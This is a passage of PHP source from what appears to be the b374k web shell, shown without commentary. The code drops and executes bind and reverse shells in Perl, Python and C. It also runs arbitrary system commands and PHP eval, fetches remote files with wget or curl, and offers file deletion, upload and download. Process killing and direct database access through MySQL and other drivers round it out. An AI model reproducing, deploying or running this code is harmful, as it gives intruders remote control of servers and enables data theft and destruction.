86.         if(is_file($fpath)) unlink($fpath);
87.         if($file=fopen($fpath,"w")){
88.             fwrite($file,$fc);
89.             fclose($file);
90.             if(is_file($fpath)){
91.                 $res = exe("chmod +x ".$fpath);
92.                 $res = exe("perl ".$fpath." ".$target);
93.             }
94.             else $result = $errperm;
95.         }
96.         else $result = $errperm;
97.     }
98.     elseif($type == "xbind_py"){
99.         $fname = "b374k_bind.py";
100.         $fpath = $d.$fname;
101.         if(is_file($fpath)) unlink($fpath);
102.         if($file=fopen($fpath,"w")){
103.             fwrite($file,$fc);
104.             fclose($file);
105.             if(is_file($fpath)){
106.                 $res = exe("chmod +x ".$fpath);
107.                 $res = exe("python ".$fpath." ".$target);
108.             }
109.             else $result = $errperm;
110.         }
111.         else $result = $errperm;
112.  
113.     }
114.     elseif($type == "xbind_bin"){
115.         $fname = "b374k_bind";
116.         $fpath = $d.$fname;
117.  
118.         if(!$s_win){
119.             if(is_file($fpath)) unlink($fpath);
120.             if(is_file($fpath.".c")) unlink($fpath.".c");
121.             if($file=fopen($fpath.".c","w")){
122.                 fwrite($file,$fc);
123.                 fclose($file);
124.                 if(is_file($fpath.".c")){
125.                     $res = exe("gcc ".$fpath.".c -o ".$fpath);
126.                     if(is_file($fpath)){
127.                         $res = exe("chmod +x ".$fpath);
128.                         $res = exe($fpath." ".$target);
129.                     }
130.                     else $result = $errgcc;
131.                 }
132.                 else $result = $errperm;
133.  
134.             }
135.             else $result = $errperm;
136.         }
137.         else{
138.             $fpath = $fpath . ".exe";
139.             if(is_file($fpath)) unlink($fpath);
140.             if($file=fopen($fpath,"w")){
141.                 fwrite($file,$fc);
142.                 fclose($file);
143.                 if(is_file($fpath)){
144.                     $res = exe("\"".$fpath."\" ".$target);
145.                 }
146.                 else $result = $errperm;
147.             }
148.             else $result = $errperm;
149.         }
150.  
151.     }
152.     elseif($type == "xback_pl"){
153.         $fname = "b374k_back.pl";
154.         $fpath = $d.$fname;
155.         $tar = explode(" ",$target,2);
156.         if(is_file($fpath)) unlink($fpath);
157.         if($file=fopen($fpath,"w")){
158.             fwrite($file,$fc);
159.             fclose($file);
160.             if(is_file($fpath)){
161.                 $res = exe("chmod +x ".$fpath);
162.                 $res = exe("perl ".$fpath." ".$target);
163.             }
164.             else $result = $errperm;
165.         }
166.         else $result = $errperm;
167.     }
168.     elseif($type == "xback_py"){
169.         $fname = "b374k_back.py";
170.         $fpath = $d.$fname;
171.         $tar = explode(" ",$target,2);
172.         if(is_file($fpath)) unlink($fpath);
173.         if($file=fopen($fpath,"w")){
174.             fwrite($file,$fc);
175.             fclose($file);
176.             if(is_file($fpath)){
177.                 $res = exe("chmod +x ".$fpath);
178.                 $res = exe("python ".$fpath." ".$target);
179.             }
180.             else $result = $errperm;
181.         }
182.         else $result = $errperm;
183.  
184.     }
185.     elseif($type == "xback_bin"){
186.         $fname = "b374k_back";
187.         $fpath = $d.$fname;
188.         $tar = explode(" ",$target,2);
189.  
190.         if(!$s_win){
191.             if(is_file($fpath)) unlink($fpath);
192.             if(is_file($fpath.".c")) unlink($fpath.".c");
193.             if($file=fopen($fpath.".c","w")){
194.                 fwrite($file,$fc);
195.                 fclose($file);
196.                 if(is_file($fpath.".c")){
197.                     $res = exe("gcc ".$fpath.".c -o ".$fpath);
198.                     if(is_file($fpath)){
199.                         $res = exe("chmod +x ".$fpath);
200.                         $res = exe($fpath." ".$target);
201.                     }
202.                     else $result = $errgcc;
203.                 }
204.                 else $result = $errperm;
205.             }
206.             else $result = $errperm;
207.         }
208.         else{
209.             $fpath = $fpath . ".exe";
210.             if(is_file($fpath)) unlink($fpath);
211.             if($file=fopen($fpath,"w")){
212.                 fwrite($file,$fc);
213.                 fclose($file);
214.                 if(is_file($fpath)){
215.                     $res = exe($fpath." ".$target);
216.                 }
217.                 else $result = $errperm;
218.             }
219.             else $result = $errperm;
220.         }
221.     }
222.  
223.     return $result;
224. }
225. // get file size
226. function gs($f){
227.     if($s = filesize($f)){
228.         if($s <= 1024) return $s;
229.         else{
230.             if($s <= 1024*1024) {
231.                 $s = round($s / 1024,2);;
232.                 return $s." kb";
233.             }
234.             else {
235.                 $s = round($s / 1024 / 1024,2);
236.                 return $s." mb";
237.             }
238.         }
239.     }
240.     else return "???";
241. }
242. // get file permissions
243. function gp($f){
244.     if($m=fileperms($f)){
245.         $p='';
246.         $p .= ($m & 00400) ? 'r' : '-';
247.         $p .= ($m & 00200) ? 'w' : '-';
248.         $p .= ($m & 00100) ? 'x' : '-';
249.         $p .= ($m & 00040) ? 'r' : '-';
250.         $p .= ($m & 00020) ? 'w' : '-';
251.         $p .= ($m & 00010) ? 'x' : '-';
252.         $p .= ($m & 00004) ? 'r' : '-';
253.         $p .= ($m & 00002) ? 'w' : '-';
254.         $p .= ($m & 00001) ? 'x' : '-';
255.         return $p;
256.     }
257.     else return "??????????";
258. }
259. // shell command
260. function exe($c){
261.     if(function_exists('system')) {
262.         ob_start();
263.         system($c);
264.         $b = ob_get_contents();
265.         ob_end_clean();
266.         return $b;
267.     }
268.     elseif(function_exists('shell_exec')){
269.         $b = shell_exec($c);
270.         return $b;
271.     }
272.     elseif(function_exists('exec')) {
273.         exec($c,$r);
274.         $b = "";
275.         foreach($r as $s){
276.             $b .= $s;
277.         }
278.         return $b;
279.     }
280.     elseif(function_exists('passthru')) {
281.         ob_start();
282.         passthru($c);
283.         $b = ob_get_contents();
284.         ob_end_clean();
285.         return $b;
286.     }
287.     return ""; // failed... oh my
288. }
289. // add slash to the end of given path
290. function cp($p){
291.     if(is_dir($p)){
292.         $x = DIRECTORY_SEPARATOR;
293.         while(substr($p,-1) == $x) $p = rtrim($p,$x);
294.         return $p.$x;
295.     }
296.     return $p;
297. }
298. // delete dir and all of its content (no warning !) xp
299. function rmdirs($d) {
300.     $f = glob($d . '*', GLOB_MARK);
301.     foreach($f as $z){
302.         if(is_dir($z)) rmdirs($z);
303.         else unlink($z);
304.     }
305.     if(is_dir($d)) rmdir($d);
306. }
307. function xwhich($pr){
308.     $p = exe("which $pr");
309.     if(trim($p)!="") { return trim($p); } else { return trim($pr); }
310. }
311. // download file from internet
312. function dlfile($u,$p){
313.     $n = basename($u);
314.  
315.     // try using php functions
316.     if($t = file_get_contents($u)){
317.         if(is_file($p)) unlink($p);;
318.         if($f=fopen($p,"w")){
319.             fwrite($f,$t);
320.             fclose($f);
321.             if(is_file($p)) return true;
322.         }
323.     }
324.  
325.     // using wget
326.     exe(xwhich('wget')." ".$u." -O ".$p);
327.     if(is_file($p)) return true;
328.  
329.     // try using lwp-download
330.     exe(xwhich('lwp-download')." ".$u." ".$p);
331.     if(is_file($p)) return true;
332.  
333.     // try using lynx
334.     exe(xwhich('lynx')." -source ".$u." > ".$p);
335.     if(is_file($p)) return true;
336.  
337.     // try using curl
338.     exe(xwhich('curl')." ".$u." -o ".$p);
339.     if(is_file($p)) return true;
340.  
341.     return false;
342. }
343. // explorer, return a table of given dir
344. function showdir($pwd,$prompt,$win){
345.     if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
346.     else $posix = FALSE;
347.  
348.     $user = "????:????";
349.     $fname = array();
350.     $dname = array();
351.  
352.     if($dh = scandir($pwd)){
353.         foreach($dh as $file){
354.             if(is_dir($file)) $dname[] = $file;
355.             elseif(is_file($file)) $fname[] = $file;
356.         }
357.     }
358.     else{
359.         if($dh = opendir($pwd)){
360.             while($file = readdir($dh)){
361.                 if(is_dir($file)) $dname[] = $file;
362.                 elseif(is_file($file))$fname[] = $file;
363.             }
364.             closedir($dh);
365.         }
366.     }
367.  
368.     sort($fname);
369.     sort($dname);
370.  
371.     $path = explode(DIRECTORY_SEPARATOR,$pwd);
372.     $tree = sizeof($path);
373.     $parent = "";
374.     $buff = "
375. <table class=\"explore sortable\">
376.     <tr><th>name</th><th style=\"width:60px;\">size</th><th style=\"width:100px;\">owner : group</th><th style=\"width:70px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:210px;\">actions</th></tr>
377.     ";
378.     if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
379.     else $parent = $pwd;
380.  
381.     foreach($dname as $folder){
382.         if($folder == ".") {
383.             if(!$win && $posix){
384.                 $name = posix_getpwuid(fileowner($folder));
385.                 $group = posix_getgrgid(filegroup($folder));
386.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
387.             }
388.             else {
389.                 $owner = $user;
390.             }
391.             $buff .= "<tr><td><a href=\"?d=".$pwd."\">[ $folder ]</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td  style=\"text-align:center;\">".gp($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($pwd))."</td><td><span id=\"titik1\"><a href=\"?d=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a> | <a href=\"?upload&amp;d=$pwd\">upload</a></span>
392.             <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
393.             <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
394.             <input class=\"inputz\" id=\"titik1_\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
395.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
396.             </form></td></tr>
397.             ";
398.         }
399.         elseif($folder == "..") {
400.             if(!$win && $posix){
401.                 $name = posix_getpwuid(fileowner($folder));
402.                 $group = posix_getgrgid(filegroup($folder));
403.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
404.             }
405.             else {
406.                 $owner = $user;
407.             }
408.             $buff .= "<tr><td><a href=\"?d=".$parent."\">[ $folder ]</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td style=\"text-align:center;\">".gp($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?d=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a> | <a href=\"?upload&amp;d=$parent\">upload</a></span>
409.             <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
410.             <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
411.             <input class=\"inputz\" id=\"titik2_\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
412.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
413.             </form>
414.             </td></tr>";
415.         }
416.         else {
417.             if(!$win && $posix){
418.                 $name = posix_getpwuid(fileowner($folder));
419.                 $group = posix_getgrgid(filegroup($folder));
420.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
421.             }
422.             else {
423.                 $owner = $user;
424.             }
425.             $buff .= "<tr><td><a id=\"".cs($folder)."_link\" href=\"?d=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a>
426.             <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"".cs($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
427.             <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
428.             <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
429.             <input class=\"inputz\" style=\"width:200px;\" id=\"".cs($folder)."_link_\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
430.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
431.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".cs($folder)."_form','".cs($folder)."_link');\" />
432.             </form>
433.             <td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td style=\"text-align:center;\">".gp($pwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($folder))."</td><td><a href=\"javascript:tukar('".cs($folder)."_link','".cs($folder)."_form');\">rename</a> | <a href=\"?d=".$pwd."&amp;rmdir=".$pwd.$folder."\">delete</a> | <a href=\"?upload&amp;d=".$pwd.$folder."\">upload</a></td></tr>";
434.         }
435.     }
436.  
437.     foreach($fname as $file){
438.         $full = $pwd.$file;
439.         if(!$win && $posix){
440.             $name = posix_getpwuid(fileowner($full));
441.             $group = posix_getgrgid(filegroup($full));
442.             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
443.         }
444.         else {
445.             $owner = $user;
446.         }
447.         $buff .= "<tr><td><a id=\"".cs($file)."_link\" href=\"?d=$pwd&amp;view=$full\">$file</a>
448.         <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"".cs($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
449.         <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
450.         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
451.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" id=\"".cs($file)."_link_\" name=\"newname\" value=\"".$file."\" />
452.         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
453.         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".cs($file)."_link','".cs($file)."_form');\" />
454.         </form>
455.         </td><td>".gs($full)."</td><td style=\"text-align:center;\">".$owner."</td><td style=\"text-align:center;\">".gp($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($full))."</td>
456.         <td><a href=\"?d=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".cs($file)."_link','".cs($file)."_form');\">rename</a> | <a href=\"?d=$pwd&amp;delete=$full\">delete</a> | <a href=\"?d=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?d=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>";
457.     }
458.     $buff .= "</table>";
459.     return $buff;
460. }
461.  
462. // favicon
463. if(isset($_REQUEST['favicon'])){
464.     $data = gzinflate(base64_decode($favicon));
465.     header("Content-type: image/png");
466.     header("Cache-control: public");
467.     echo $data;
468.     exit;
469. }
470. if($s_auth){
471.     // server software
472.     $s_software = getenv("SERVER_SOFTWARE");
473.     // check safemode
474.     if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on")  $s_safemode = TRUE; else $s_safemode = FALSE;
475.     // uname -a
476.     $s_system = php_uname();
477.     // check os
478.     $s_win = FALSE;
479.     if(strtolower(substr($s_system,0,3)) == "win") $s_win = TRUE;
480.     // get path and all drives available
481.     $letters = '';
482.     if(!$s_win){
483.         if(!$s_user = rp(exe("whoami"))) $s_user = "";
484.         if(!$s_id = rp(exe("id"))) $s_id = "";
485.         $pwd = getcwd().DIRECTORY_SEPARATOR;
486.     }
487.     else {
488.         $s_user = get_current_user();
489.         $s_id = $s_user;
490.         $pwd = realpath(".")."\\";
491.         // find drive letters
492.         $v = explode("\\",$d);
493.         $v = $v[0];
494.         foreach (range("A","Z") as $letter){
495.             $bool = @is_dir($letter.":\\");
496.             if ($bool){
497.                 $letters .= "<a href=\"?d=".$letter.":\\\">[ ";
498.                 if ($letter.":" != $v) {$letters .= $letter;}
499.                 else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
500.                 $letters .= " ]</a> ";
501.             }
502.         }
503.     }
504.     // prompt style..
505.     $s_prompt = $s_user." &gt;";
506.  
507.     // check for posix
508.     if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $s_posix = TRUE;
509.     else $s_posix = FALSE;
510.  
511.     // server ip
512.     $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
513.     // your ip ;-)
514.     $s_my_ip = $_SERVER['REMOTE_ADDR'];
515.  
516.     // change working directory
517.     if(isset($_REQUEST['d'])){
518.         $d = ss($_REQUEST['d']);
519.         if(is_dir($d)){
520.             chdir($d);
521.             $pwd = cp($d);
522.         }
523.     }
524.     else $pwd = cp(getcwd());
525.     // sorttable.js
526.     if(isset($_REQUEST['sorttable'])){
527.         $data = gzinflate(base64_decode($sortable_js));
528.         header("Content-type: text/plain");
529.         header("Cache-control: public");
530.         echo $data;
531.         exit;
532.     }
533.     // download file specified by ?dl=<file>
534.     if(isset($_REQUEST['dl']) && ($_REQUEST['dl'] != "")){
535.         $f = ss($_REQUEST['dl']);
536.         $fc = file_get_contents($f);
537.         header("Content-type: application/octet-stream");
538.         header("Content-length: ".strlen($fc));
539.         header("Content-disposition: attachment; filename=\"".basename($f)."\";");
540.         echo $fc;
541.         exit;
542.     } // download file specified by ?dlgzip=<file> as gzip
543.     elseif(isset($_REQUEST['dlgzip']) && ($_REQUEST['dlgzip'] != "")){
544.         $f = ss($_REQUEST['dlgzip']);
545.         $fc = gzencode(file_get_contents($f));
546.         header("Content-Type:application/x-gzip\n");
547.         header("Content-length: ".strlen($fc));
548.         header("Content-disposition: attachment; filename=\"".basename($f).".gz\";");
549.         echo $fc;
550.         exit;
551.     }
552.     // kill process specified by pid
553.     if(isset($_REQUEST['pid'])){
554.         $p = ss($_REQUEST['pid']);
555.         if(function_exists("posix_kill")) posix_kill($p,'9');
556.         else{
557.             exe("kill -9 ".$p);
558.             exe("taskkill /F /PID ".$p);
559.         }
560.     }
561.     // view image specified by ?img=<file>
562.     if(isset($_REQUEST['img'])){
563.         ob_clean();
564.         $d = ss($_REQUEST['d']);
565.         $f = ss($_REQUEST['img']);
566.         $inf = getimagesize($d.$f);
567.         $ext = explode($f,".");
568.         $ext = $ext[count($ext)-1];
569.         header("Content-type: ".$inf["mime"]);
570.         header("Cache-control: public");
571.         header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
572.         header("Cache-control: max-age=".(60*60*24*7));
573.         readfile($d.$f);
574.         exit;
575.     }
576.     // rename file or folder
577.     if(isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])){
578.         $old = ss($_REQUEST['oldname']);
579.         $new = ss($_REQUEST['newname']);
580.         rename($pwd.$old,$pwd.$new);
581.         $fnew = $pwd.$new;
582.     }
583.     // delete file
584.     if(isset($_REQUEST['delete']) && ($_REQUEST['delete'] != "")){
585.         $f = ss($_REQUEST['delete']);
586.         if(is_file($f)) unlink($f);
587.     } // delete dir
588.     elseif(isset($_REQUEST['rmdir']) && ($_REQUEST['rmdir'] != "")){
589.         $f = ss(rtrim(ss($_REQUEST['rmdir'],DIRECTORY_SEPARATOR)));
590.         if(is_dir($f)) rmdirs($f);
591.     } // create dir
592.     elseif(isset($_REQUEST['mkdir']) && ($_REQUEST['mkdir'] != "")){
593.         $f = ss($pwd.ss($_REQUEST['mkdir']));
594.         if(!is_dir($f)) mkdir($f);
595.     }
596.     // box result
597.     $s_result = "";
598.     // php eval() function
599.     if(isset($_REQUEST['eval'])){
600.         $c = "";
601.         if(isset($_REQUEST['evalcode'])){
602.             // show error
603.             $eval_addition = "error_reporting(E_ALL);@ini_set(\"display_errors\", 1);";
604.             $c = ss($_REQUEST['evalcode']);
605.             ob_start();
606.             eval(eval($eval_addition) . eval($c));
607.             $b = ob_get_contents();
608.             ob_end_clean();
609.             $code = $b;
610.         }
611.         $s_result .= "  <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
612.                 <textarea id=\"evalcode\" name=\"evalcode\" class=\"evalcode\">".htmlspecialchars($code)."</textarea>
613.                 <p><input type=\"submit\" name=\"evalcodesubmit\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" /></p>
614.     <input type=\"hidden\" name=\"eval\" value=\"\" />
615.     <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
616.     </form>
617.                 ";
618.     } // upload !
619.     elseif(isset($_REQUEST['upload'])){
620.         $s_result = " ";
621.         $msg = "";
622.         if(isset($_REQUEST['uploadhd'])){
623.             $fn = $_FILES['filepath']['name'];
624.             if(is_uploaded_file($_FILES['filepath']['tmp_name'])){
625.                 $p = cp(ss($_REQUEST['savefolder']));
626.                 if(!is_dir($p)) $p = cp(dirname($p));
627.                 if(isset($_REQUEST['savefilename']) && (trim($_REQUEST['savefilename'])!="")) $fn = ss($_REQUEST['savefilename']);
628.                 $tm = $_FILES['filepath']['tmp_name'];
629.                 $pi = cp($p).$fn;
630.                 $st = move_uploaded_file($tm,$pi);
631.                 if($st) $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=".$pwd."&amp;view=".$pi."\">".$pi."</a></p>";
632.                 else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
633.             }
634.             else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
635.         }
636.         elseif(isset($_REQUEST['uploadurl'])){
637.             // function dlfile($url,$fpath){
638.             $p = cp(ss($_REQUEST['savefolderurl']));
639.             if(!is_dir($p)) $p = cp(dirname($p));
640.             $fu = ss($_REQUEST['fileurl']);
641.             $fn = basename($fu);
642.             if(isset($_REQUEST['savefilenameurl']) && (trim($_REQUEST['savefilenameurl'])!="")) $fn = ss($_REQUEST['savefilenameurl']);
643.             $fp = cp($p).$fn;
644.             $st = dlfile($fu,$fp);
645.             if($st) $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=".$pwd."&amp;view=".$fp."\">".$fp."</a></p>";
646.             else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
647.         }  
648.  
649.         $s_result .= $msg;
650.         $s_result .= "
651.         <form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\" enctype=\"multipart/form-data\">
652.         <div class=\"mybox\"><h2>Upload from computer</h2>
653.         <table class=\"myboxtbl\">
654.         <tr><td style=\"width:100px;\">File</td><td><input type=\"file\" name=\"filepath\" class=\"inputzbut\" style=\"width:400px;margin:0;\" />
655.     </td></tr>
656.         <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolder\" value=\"".$pwd."\" /></td></tr>
657.         <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilename\" value=\"\" /></td></tr>
658.         <tr><td>&nbsp;</td><td>
659.         <input type=\"submit\" name=\"uploadhd\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
660.     </td></tr>
661.  
662.         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
663.         </table>
664.         </div>
665.         </form>
666.  
667.         <form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\">
668.         <div class=\"mybox\"><h2>Upload from internet</h2>
669.         <table class=\"myboxtbl\">
670.         <tr><td style=\"width:100px;\">File URL</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"fileurl\" value=\"\" />
671.     </td></tr>
672.         <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolderurl\" value=\"".$pwd."\" /></td></tr>
673.         <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilenameurl\" value=\"\" /></td></tr>
674.         <tr><td>&nbsp;</td><td>
675.         <input type=\"submit\" name=\"uploadurl\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
676.     </td></tr>
677.  
678.         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
679.         </table>
680.         </div>
681.         </form>
682.  
683.         ";
684.     } // show phpinfo()
685.     elseif(isset($_REQUEST['phpinfo'])){
686.         ob_start();
687.         eval("phpinfo();");
688.         $b = ob_get_contents();
689.         ob_end_clean();
690.         $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
691.         $z = strpos($b,"</body>");
692.         $s_result = "<div class=\"phpinfo\">".substr($b,$a,$z-$a)."</div>";
693.     } // working with database
694.     elseif(isset($_REQUEST['db'])){
695.         $sqlhost = $sqlhost1 = $sqlhost2 = $sqlhost3 = $sqlhost4 = 'localhost';
696.         $sqluser = $sqluser1 = $sqluser2 = $sqluser3 = $sqluser4 = $odbcuser = $odbcdsn = $pdodsn = $pdouser = '';
697.         $sqlport = $sqlport1 = $sqlport2 = $sqlport3 = $sqlport4 = '';
698.         $sqlpass = $sqlpass1 = $sqlpass2 = $sqlpass3 = $sqlpass4 = $odbcpass = $pdopass = '';
699.  
700.         if(isset($_REQUEST['mysqlcon'])&&isset($_REQUEST['sqlhost1'])) $sqlhost = $sqlhost1 = ss($_REQUEST['sqlhost1']);
701.         if(isset($_REQUEST['mssqlcon'])&&isset($_REQUEST['sqlhost2'])) $sqlhost = $sqlhost2 = ss($_REQUEST['sqlhost2']);
702.         if(isset($_REQUEST['pgsqlcon'])&&isset($_REQUEST['sqlhost3'])) $sqlhost = $sqlhost3 = ss($_REQUEST['sqlhost3']);
703.         if(isset($_REQUEST['oraclecon'])&&isset($_REQUEST['sqlhost4'])) $sqlhost = $sqlhost4 = ss($_REQUEST['sqlhost4']);
704.         if(isset($_REQUEST['odbccon'])&&isset($_REQUEST['odbcdsn'])) $odbcdsn = ss($_REQUEST['odbcdsn']);
705.         if(isset($_REQUEST['pdocon'])&&isset($_REQUEST['pdodsn'])) $pdodsn = ss($_REQUEST['pdodsn']);
706.         if(isset($_REQUEST['sqlhost'])) $sqlhost = ss($_REQUEST['sqlhost']);
707.  
708.         if(isset($_REQUEST['mysqlcon'])&&isset($_REQUEST['sqluser1'])) $sqluser = $sqluser1 = ss($_REQUEST['sqluser1']);
709.         if(isset($_REQUEST['mssqlcon'])&&isset($_REQUEST['sqluser2'])) $sqluser = $sqluser2 = ss($_REQUEST['sqluser2']);
710.         if(isset($_REQUEST['pgsqlcon'])&&isset($_REQUEST['sqluser3'])) $sqluser = $sqluser3 = ss($_REQUEST['sqluser3']);
711.         if(isset($_REQUEST['oraclecon'])&&isset($_REQUEST['sqluser4'])) $sqluser = $sqluser4 = ss($_REQUEST['sqluser4']);
712.         if(isset($_REQUEST['odbccon'])&&isset($_REQUEST['odbcuser'])) $odbcuser = ss($_REQUEST['odbcuser']);
713.         if(isset($_REQUEST['pdocon'])&&isset($_REQUEST['pdouser'])) $pdouser = ss($_REQUEST['pdouser']);
714.         if(isset($_REQUEST['sqluser'])) $sqluser = ss($_REQUEST['sqluser']);
715.  
716.         if(isset($_REQUEST['mysqlcon'])&&isset($_REQUEST['sqlport1'])) $sqlport = $sqlport1 = ss($_REQUEST['sqlport1']);
717.         if(isset($_REQUEST['mssqlcon'])&&isset($_REQUEST['sqlport2'])) $sqlport = $sqlport2 = ss($_REQUEST['sqlport2']);
718.         if(isset($_REQUEST['pgsqlcon'])&&isset($_REQUEST['sqlport3'])) $sqlport = $sqlport3 = ss($_REQUEST['sqlport3']);
719.         if(isset($_REQUEST['oraclecon'])&&isset($_REQUEST['sqlport4'])) $sqlport = $sqlport4 = ss($_REQUEST['sqlport4']);
720.         if(isset($_REQUEST['sqlport'])) $sqlport = ss($_REQUEST['sqlport']);
721.  
722.         if(isset($_REQUEST['mysqlcon'])&&isset($_REQUEST['sqlpass1'])) $sqlpass = $sqlpass1 = ss($_REQUEST['sqlpass1']);
723.         if(isset($_REQUEST['mssqlcon'])&&isset($_REQUEST['sqlpass2'])) $sqlpass = $sqlpass2 = ss($_REQUEST['sqlpass2']);
724.         if(isset($_REQUEST['pgsqlcon'])&&isset($_REQUEST['sqlpass3'])) $sqlpass = $sqlpass3 = ss($_REQUEST['sqlpass3']);
725.         if(isset($_REQUEST['oraclecon'])&&isset($_REQUEST['sqlpass4'])) $sqlpass = $sqlpass4 = ss($_REQUEST['sqlpass4']);
726.         if(isset($_REQUEST['odbccon'])&&isset($_REQUEST['odbcpass'])) $odbcpass = ss($_REQUEST['odbcpass']);
727.         if(isset($_REQUEST['pdocon'])&&isset($_REQUEST['pdopass'])) $pdopass = ss($_REQUEST['pdopass']);
728.         if(isset($_REQUEST['sqlpass'])&&isset($_REQUEST['sqlpass'])) $sqlpass = ss($_REQUEST['sqlpass']);
729.  
730.         $sqls = "";
731.         $q_result = "";
732.         $hostandport = $sqlhost;
733.         if(trim($sqlport)!="") $hostandport = $sqlhost.":".$sqlport;
734.  
735.         if(isset($_REQUEST['mysqlcon']) && ($con = mysql_connect($hostandport,$sqluser,$sqlpass))){
736.             if(isset($_REQUEST['sqlcode'])){
737.                 $sqls = ss($_REQUEST['sqlcode']);
738.                 $querys = explode(";",$sqls);
739.  
740.                 foreach($querys as $query){
741.                   if(trim($query) != ""){
742.                     $hasil = mysql_query($query);
743.                     if($hasil){
744.                         $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
745.                         <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
746.                         <table class=\"explore\" style=\"width:99%;\"><tr>";
747.                         for($i=0;$i<mysql_num_fields($hasil);$i++)
748.                             $q_result .= "<th>".htmlspecialchars(mysql_field_name($hasil,$i))."</th>";
749.                         $q_result .= "</tr>";
750.                         while($rows=mysql_fetch_array($hasil)){
751.                             $q_result .= "<tr>";
752.                             for($j=0;$j<mysql_num_fields($hasil);$j++)
753.                             {
754.                                 if($rows[$j] == "") $dataz = " ";
755.                                 else $dataz = $rows[$j];
756.                                 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
757.                             }
758.                             $q_result .= "</tr>";
759.                         }
760.                         $q_result .= "</table>";
761.                     }
762.                     else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
763.                             <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
